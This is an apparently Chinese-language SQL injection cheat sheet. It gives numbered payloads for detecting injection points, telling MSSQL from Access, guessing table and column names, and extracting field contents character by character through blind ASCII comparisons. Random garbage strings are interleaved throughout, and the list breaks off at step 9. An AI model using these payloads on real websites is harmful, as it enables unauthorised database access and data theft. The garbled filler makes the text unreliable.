1.判断是否有注入;and 1=1 ;and 1=2 Lab{?!E>U
2.初步判断是否是mssql ;and user>0 sl>4O]N
;?bRRW
3.注入参数是字符'and [查询条件] and ''=' *p p1U>,
pT:CvJ
4.搜索时没过滤参数的'and [查询条件] and '%25'=' &A]*"lt|w
{WT"\Xj>B?
5.判断数据库系统 }G_ i+
@4_W}1W
;and (select count(*) from sysobjects)>0 mssql }yC ve
n SmYa7
;and (select count(*) from msysobjects)>0 access tk2B\}6
=^O84Cp 6
3]M
YHb
Hk(w\
6.猜数据库 ;and (select Count(*) from [数据库名])>0 &EV|knW
ngn%"xYX
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 qqLmjDv
3Ud&B
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 'R99kL/.N
uXyNj2(d.
9.(1)猜字段的ascii值(access) G{$9e}#
t&eY+3y,T
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 4f'WF5S/}8
\^w=T*
(2)猜字段的ascii值(mssql) Ds$FO}KD{
}|&